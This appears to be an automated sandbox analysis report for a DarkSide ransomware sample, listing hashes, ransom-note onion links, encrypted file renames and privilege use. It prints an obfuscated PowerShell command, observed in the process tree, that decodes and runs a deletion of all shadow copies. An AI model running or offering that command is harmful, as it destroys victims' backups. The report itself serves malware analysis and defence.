Analysis
-
max time kernel
35s -
max time network
136s -
platform
windows10_x64 -
resource
win10v20210408 -
submitted
26-07-2021 12:39
Static task
static1
Behavioral task
behavioral1
Sample
9cee5522a7ca2bfca7cd3d9daba23e9a30deb6205f56c12045839075f7627297.sample.exe
Resource
win7v20210408
Behavioral task
behavioral2
Sample
9cee5522a7ca2bfca7cd3d9daba23e9a30deb6205f56c12045839075f7627297.sample.exe
Resource
win10v20210408
General
-
Target
9cee5522a7ca2bfca7cd3d9daba23e9a30deb6205f56c12045839075f7627297.sample.exe
-
Size
17KB
-
MD5
f87a2e1c3d148a67eaeb696b1ab69133
-
SHA1
d1dfe82775c1d698dd7861d6dfa1352a74551d35
-
SHA256
9cee5522a7ca2bfca7cd3d9daba23e9a30deb6205f56c12045839075f7627297
-
SHA512
e361811b07a66d9a784be37bdace0bdec9e11374083d7ccf7d9830e47a59afa8b9d12d80d4d47ea1932116354ad60bbc8ea6a6a265885d264b35486986415ea3
Malware Config
Extracted
C:\\README.f001f8d5.TXT
darkside
http://darksidedxcftmqa.onion/blog/article/id/6/dQDclB_6Kg-c-6fJesONyHoaKh9BtI8j9Wkw2inG8O72jWaOcKbrxMWbPfKrUbHC
http://darksidfqzcuhtk2.onion/K71D6P88YTX04R3ISCJZHMD5IYV55V9247QHJY0HJYUXX68H2P05XPRIR5SP2U68
Signatures
-
DarkSide
Targeted ransomware first seen in August 2020. Operators steal data to use as leverage.
-
Modifies extensions of user files 20 IoCs
Ransomware generally changes the extension on encrypted files.
Processes:
9cee5522a7ca2bfca7cd3d9daba23e9a30deb6205f56c12045839075f7627297.sample.exedescription ioc process File opened for modification C:\Users\Admin\Pictures\CopyReset.raw.f001f8d5 9cee5522a7ca2bfca7cd3d9daba23e9a30deb6205f56c12045839075f7627297.sample.exe File renamed C:\Users\Admin\Pictures\MergeUnregister.tiff => C:\Users\Admin\Pictures\MergeUnregister.tiff.f001f8d5 9cee5522a7ca2bfca7cd3d9daba23e9a30deb6205f56c12045839075f7627297.sample.exe File opened for modification C:\Users\Admin\Pictures\SplitRedo.png.f001f8d5 9cee5522a7ca2bfca7cd3d9daba23e9a30deb6205f56c12045839075f7627297.sample.exe File renamed C:\Users\Admin\Pictures\BlockConvert.png => C:\Users\Admin\Pictures\BlockConvert.png.f001f8d5 9cee5522a7ca2bfca7cd3d9daba23e9a30deb6205f56c12045839075f7627297.sample.exe File opened for modification C:\Users\Admin\Pictures\CompleteDisconnect.tiff 9cee5522a7ca2bfca7cd3d9daba23e9a30deb6205f56c12045839075f7627297.sample.exe File renamed C:\Users\Admin\Pictures\CopyReset.raw => C:\Users\Admin\Pictures\CopyReset.raw.f001f8d5 9cee5522a7ca2bfca7cd3d9daba23e9a30deb6205f56c12045839075f7627297.sample.exe File renamed C:\Users\Admin\Pictures\JoinOut.tif => C:\Users\Admin\Pictures\JoinOut.tif.f001f8d5 9cee5522a7ca2bfca7cd3d9daba23e9a30deb6205f56c12045839075f7627297.sample.exe File opened for modification C:\Users\Admin\Pictures\MergeUnregister.tiff 9cee5522a7ca2bfca7cd3d9daba23e9a30deb6205f56c12045839075f7627297.sample.exe File renamed C:\Users\Admin\Pictures\RestartEdit.raw => C:\Users\Admin\Pictures\RestartEdit.raw.f001f8d5 9cee5522a7ca2bfca7cd3d9daba23e9a30deb6205f56c12045839075f7627297.sample.exe File renamed C:\Users\Admin\Pictures\SplitRedo.png => C:\Users\Admin\Pictures\SplitRedo.png.f001f8d5 9cee5522a7ca2bfca7cd3d9daba23e9a30deb6205f56c12045839075f7627297.sample.exe File opened for modification C:\Users\Admin\Pictures\BlockConvert.png.f001f8d5 9cee5522a7ca2bfca7cd3d9daba23e9a30deb6205f56c12045839075f7627297.sample.exe File renamed C:\Users\Admin\Pictures\CompleteDisconnect.tiff => C:\Users\Admin\Pictures\CompleteDisconnect.tiff.f001f8d5 9cee5522a7ca2bfca7cd3d9daba23e9a30deb6205f56c12045839075f7627297.sample.exe File renamed C:\Users\Admin\Pictures\ResolveRegister.tif => C:\Users\Admin\Pictures\ResolveRegister.tif.f001f8d5 9cee5522a7ca2bfca7cd3d9daba23e9a30deb6205f56c12045839075f7627297.sample.exe File opened for modification C:\Users\Admin\Pictures\RestartEdit.raw.f001f8d5 9cee5522a7ca2bfca7cd3d9daba23e9a30deb6205f56c12045839075f7627297.sample.exe File opened for modification C:\Users\Admin\Pictures\CompleteDisconnect.tiff.f001f8d5 9cee5522a7ca2bfca7cd3d9daba23e9a30deb6205f56c12045839075f7627297.sample.exe File opened for modification C:\Users\Admin\Pictures\JoinOut.tif.f001f8d5 9cee5522a7ca2bfca7cd3d9daba23e9a30deb6205f56c12045839075f7627297.sample.exe File opened for modification C:\Users\Admin\Pictures\MergeUnregister.tiff.f001f8d5 9cee5522a7ca2bfca7cd3d9daba23e9a30deb6205f56c12045839075f7627297.sample.exe File opened for modification C:\Users\Admin\Pictures\ResolveRegister.tif.f001f8d5 9cee5522a7ca2bfca7cd3d9daba23e9a30deb6205f56c12045839075f7627297.sample.exe File renamed C:\Users\Admin\Pictures\StopEdit.raw => C:\Users\Admin\Pictures\StopEdit.raw.f001f8d5 9cee5522a7ca2bfca7cd3d9daba23e9a30deb6205f56c12045839075f7627297.sample.exe File opened for modification C:\Users\Admin\Pictures\StopEdit.raw.f001f8d5 9cee5522a7ca2bfca7cd3d9daba23e9a30deb6205f56c12045839075f7627297.sample.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Suspicious behavior: EnumeratesProcesses 7 IoCs
Processes:
9cee5522a7ca2bfca7cd3d9daba23e9a30deb6205f56c12045839075f7627297.sample.exepowershell.exepid process 808 9cee5522a7ca2bfca7cd3d9daba23e9a30deb6205f56c12045839075f7627297.sample.exe 808 9cee5522a7ca2bfca7cd3d9daba23e9a30deb6205f56c12045839075f7627297.sample.exe 3612 powershell.exe 3612 powershell.exe 3612 powershell.exe 808 9cee5522a7ca2bfca7cd3d9daba23e9a30deb6205f56c12045839075f7627297.sample.exe 808 9cee5522a7ca2bfca7cd3d9daba23e9a30deb6205f56c12045839075f7627297.sample.exe -
Suspicious use of AdjustPrivilegeToken 25 IoCs
Processes:
9cee5522a7ca2bfca7cd3d9daba23e9a30deb6205f56c12045839075f7627297.sample.exepowershell.exevssvc.exedescription pid process Token: SeIncreaseQuotaPrivilege 808 9cee5522a7ca2bfca7cd3d9daba23e9a30deb6205f56c12045839075f7627297.sample.exe Token: SeSecurityPrivilege 808 9cee5522a7ca2bfca7cd3d9daba23e9a30deb6205f56c12045839075f7627297.sample.exe Token: SeTakeOwnershipPrivilege 808 9cee5522a7ca2bfca7cd3d9daba23e9a30deb6205f56c12045839075f7627297.sample.exe Token: SeLoadDriverPrivilege 808 9cee5522a7ca2bfca7cd3d9daba23e9a30deb6205f56c12045839075f7627297.sample.exe Token: SeSystemProfilePrivilege 808 9cee5522a7ca2bfca7cd3d9daba23e9a30deb6205f56c12045839075f7627297.sample.exe Token: SeSystemtimePrivilege 808 9cee5522a7ca2bfca7cd3d9daba23e9a30deb6205f56c12045839075f7627297.sample.exe Token: SeProfSingleProcessPrivilege 808 9cee5522a7ca2bfca7cd3d9daba23e9a30deb6205f56c12045839075f7627297.sample.exe Token: SeIncBasePriorityPrivilege 808 9cee5522a7ca2bfca7cd3d9daba23e9a30deb6205f56c12045839075f7627297.sample.exe Token: SeCreatePagefilePrivilege 808 9cee5522a7ca2bfca7cd3d9daba23e9a30deb6205f56c12045839075f7627297.sample.exe Token: SeBackupPrivilege 808 9cee5522a7ca2bfca7cd3d9daba23e9a30deb6205f56c12045839075f7627297.sample.exe Token: SeRestorePrivilege 808 9cee5522a7ca2bfca7cd3d9daba23e9a30deb6205f56c12045839075f7627297.sample.exe Token: SeShutdownPrivilege 808 9cee5522a7ca2bfca7cd3d9daba23e9a30deb6205f56c12045839075f7627297.sample.exe Token: SeDebugPrivilege 808 9cee5522a7ca2bfca7cd3d9daba23e9a30deb6205f56c12045839075f7627297.sample.exe Token: SeSystemEnvironmentPrivilege 808 9cee5522a7ca2bfca7cd3d9daba23e9a30deb6205f56c12045839075f7627297.sample.exe Token: SeRemoteShutdownPrivilege 808 9cee5522a7ca2bfca7cd3d9daba23e9a30deb6205f56c12045839075f7627297.sample.exe Token: SeUndockPrivilege 808 9cee5522a7ca2bfca7cd3d9daba23e9a30deb6205f56c12045839075f7627297.sample.exe Token: SeManageVolumePrivilege 808 9cee5522a7ca2bfca7cd3d9daba23e9a30deb6205f56c12045839075f7627297.sample.exe Token: 33 808 9cee5522a7ca2bfca7cd3d9daba23e9a30deb6205f56c12045839075f7627297.sample.exe Token: 34 808 9cee5522a7ca2bfca7cd3d9daba23e9a30deb6205f56c12045839075f7627297.sample.exe Token: 35 808 9cee5522a7ca2bfca7cd3d9daba23e9a30deb6205f56c12045839075f7627297.sample.exe Token: 36 808 9cee5522a7ca2bfca7cd3d9daba23e9a30deb6205f56c12045839075f7627297.sample.exe Token: SeDebugPrivilege 3612 powershell.exe Token: SeBackupPrivilege 1600 vssvc.exe Token: SeRestorePrivilege 1600 vssvc.exe Token: SeAuditPrivilege 1600 vssvc.exe -
Suspicious use of WriteProcessMemory 2 IoCs
Processes:
9cee5522a7ca2bfca7cd3d9daba23e9a30deb6205f56c12045839075f7627297.sample.exedescription pid process target process PID 808 wrote to memory of 3612 808 9cee5522a7ca2bfca7cd3d9daba23e9a30deb6205f56c12045839075f7627297.sample.exe powershell.exe PID 808 wrote to memory of 3612 808 9cee5522a7ca2bfca7cd3d9daba23e9a30deb6205f56c12045839075f7627297.sample.exe powershell.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\9cee5522a7ca2bfca7cd3d9daba23e9a30deb6205f56c12045839075f7627297.sample.exe"C:\Users\Admin\AppData\Local\Temp\9cee5522a7ca2bfca7cd3d9daba23e9a30deb6205f56c12045839075f7627297.sample.exe"1⤵
- Modifies extensions of user files
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:808 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -ep bypass -c "(0..61)|%{$s+=[char][byte]('0x'+'4765742D576D694F626A6563742057696E33325F536861646F77636F7079207C20466F72456163682D4F626A656374207B245F2E44656C65746528293B7D20'.Substring(2*$_,2))};iex $s"2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3612
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵
- Suspicious use of AdjustPrivilegeToken
PID:1600
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
MD5
ea6243fdb2bfcca2211884b0a21a0afc
SHA12eee5232ca6acc33c3e7de03900e890f4adf0f2f
SHA2565bc7d9831ea72687c5458cae6ae4eb7ab92975334861e08065242e689c1a1ba8
SHA512189db6779483e5be80331b2b64e17b328ead5e750482086f3fe4baae315d47d207d88082b323a6eb777f2f47e29cac40f37dda1400462322255849cbcc973940
-
MD5
35041379cc75fcc9fb42ce3e4f901728
SHA112051d56c93158131177eb7a8220a1f2a26889bb
SHA25668f2a1ab7e476374a20349a17c273a9a3a0941d0ac79a7a3823f0e9a8e208f69
SHA5122d2a3969250afe48905e120f267267230190a566ee82cfcb4f3e3d17bee4d90497555f5a9484a40cfb032eb4f0cf412dbddc35339957a3afe23938520a2e52a5